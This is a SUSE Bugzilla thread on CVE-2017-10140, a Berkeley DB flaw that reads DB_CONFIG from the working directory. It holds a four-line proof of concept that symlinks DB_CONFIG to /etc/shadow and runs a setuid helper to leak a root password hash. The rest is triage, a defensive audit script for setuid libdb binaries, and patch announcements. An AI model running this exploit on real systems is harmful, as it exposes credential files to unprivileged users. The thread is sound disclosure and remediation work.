Bugzilla – Bug 1043886
VUL-0: CVE-2017-10140: libdb-4_5,libdb-4_8: Berkeley DB reads DB_CONFIG from cwd
Last modified: 2018-02-22 11:09:12 UTC
OSS:2017/Q2/452

From: Jakub Wilk

Apparently Berkeley DB reads the DB_CONFIG configuration file from the current working directory by default[*]. This is surprising and AFAICT undocumented.

Here's how to exploit it against pam_ccreds:

    $ cat /etc/shadow
    cat: /etc/shadow: Permission denied
    $ ln -sf /etc/shadow DB_CONFIG
    $ /sbin/ccreds_chkpwd moo < /dev/null
    BDB1584 line 1: root:$1$QRCEVRMX$sPppjXE42AZnUPuEWf87D.:17327:0:99999:7:::: incorrect name-value pair

References:
http://seclists.org/oss-sec/2017/q2/452
So this needs a suitable vector to be a problem, but it's a pretty common component, so that's probably not hard to find.
It seems we are not affected by this exploit since we are not shipping /sbin/ccreds_chkpwd. The source of this program comes with the package pam_ccreds but it is not installed (maybe because it requires the setuid attribute). Note that the exploit works only in distributions which install ccreds_chkpwd.
AFAIU /sbin/ccreds_chkpwd is only used as an example for a suid root program that is linked against libdb. But the actual bug is in libdb and thus every suid root binary that used libdb could be used to exploit it.
The patch mentioned in http://seclists.org/oss-sec/2017/q2/479 seems to fix the problem but it might break other things. I'll try to dig more.
(In reply to Reinhard Max from comment #4) yes, that is correct
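An added example (not part of the bug thread, and not SUSE's or Oracle's code), following the point made in the comments above that any setuid root binary linked against libdb is exposed, not only ccreds_chkpwd: a shell audit that lists setuid/setgid executables with a direct libdb dependency. It assumes binutils `readelf` is installed; the function names `needs_libdb` and `audit_suid_libdb` are made up for this example.

```shell
#!/bin/sh
# Added example: scope exposure to the DB_CONFIG-from-cwd behaviour by
# listing privileged executables that link directly against Berkeley DB.
# Function names are hypothetical; requires binutils readelf.

# Read `readelf -d` output on stdin and succeed if a DT_NEEDED entry names
# libdb, e.g. "(NEEDED)  Shared library: [libdb-4.8.so]".
# libdb_cxx / libdb_java match as well; libdbus and other libdb* prefixes do
# not, because a '-', '_' or '.' must follow "libdb".
needs_libdb() {
    grep -Eq '\(NEEDED\).*\[libdb[-_.][^]]*\]'
}

# Print every setuid or setgid regular file under the given directories
# (default: /) whose dynamic section requests libdb.
# Limits: only direct dependencies are seen. libdb pulled in through another
# shared library, or through a dlopen()ed PAM/NSS module, needs a separate
# check. File names containing newlines are not handled.
audit_suid_libdb() {
    [ "$#" -gt 0 ] || set -- /
    find "$@" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        # readelf only parses the file; unlike ldd it never invokes the
        # dynamic loader on the binary being inspected.
        if readelf -d "$f" 2>/dev/null | needs_libdb; then
            ls -l "$f"
        fi
    done
}

# When called with directories as arguments, run the audit on them.
if [ "$#" -gt 0 ]; then
    audit_suid_libdb "$@"
fi
```

An empty result for the directories scanned matches the manual finding in the thread that /sbin/ccreds_chkpwd is not installed; any hit is a binary to re-check once the libdb update is applied.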
SUSE-SU-2018:0409-1: An update that contains security fixes can now be installed.

Category: security (moderate)
Bug References: 1043886
CVE References:
Sources used:
SUSE Studio Onsite 1.3 (src): libdb-4_5-4.5.20-97.5
SUSE Linux Enterprise Software Development Kit 11-SP4 (src): libdb-4_5-4.5.20-97.5, libdb_java-4_5-4.5.20-97.7
SUSE Linux Enterprise Server 11-SP4 (src): libdb-4_5-4.5.20-97.5
SUSE Linux Enterprise Debuginfo 11-SP4 (src): libdb-4_5-4.5.20-97.5, libdb_java-4_5-4.5.20-97.7
SUSE-SU-2018:0510-1: An update that contains security fixes can now be installed.

Category: security (moderate)
Bug References: 1043886
CVE References:
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP3 (src): libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Software Development Kit 12-SP2 (src): libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src): libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Server 12-SP3 (src): libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Server 12-SP2 (src): libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Desktop 12-SP3 (src): libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Desktop 12-SP2 (src): libdb-4_8-4.8.30-29.6
SUSE CaaS Platform ALL (src): libdb-4_8-4.8.30-29.6
OpenStack Cloud Magnum Orchestration 7 (src): libdb-4_8-4.8.30-29.6
You forgot openSUSE:Leap:42.3:Update/libdb-4_5
submitted missing to Leap 42.3. Asked for it to be dropped from the SLE 15 codestream and not be included in Leap 15.0
This is an autogenerated message for OBS integration: This bug (1043886) was mentioned in https://build.opensuse.org/request/show/578815 42.3 / libdb-4_5
releasing for Leap, done
openSUSE-SU-2018:0519-1: An update that contains security fixes can now be installed.

Category: security (moderate)
Bug References: 1043886
CVE References:
Sources used:
openSUSE Leap 42.3 (src): libdb-4_5-4.5.20-135.3.1, libdb_java-4_5-4.5.20-135.3.1
openSUSE-SU-2018:0520-1: An update that contains security fixes can now be installed.

Category: security (moderate)
Bug References: 1043886
CVE References:
Sources used:
openSUSE Leap 42.3 (src): libdb-4_8-4.8.30-34.3.1, libdb_java-4_8-4.8.30-34.3.1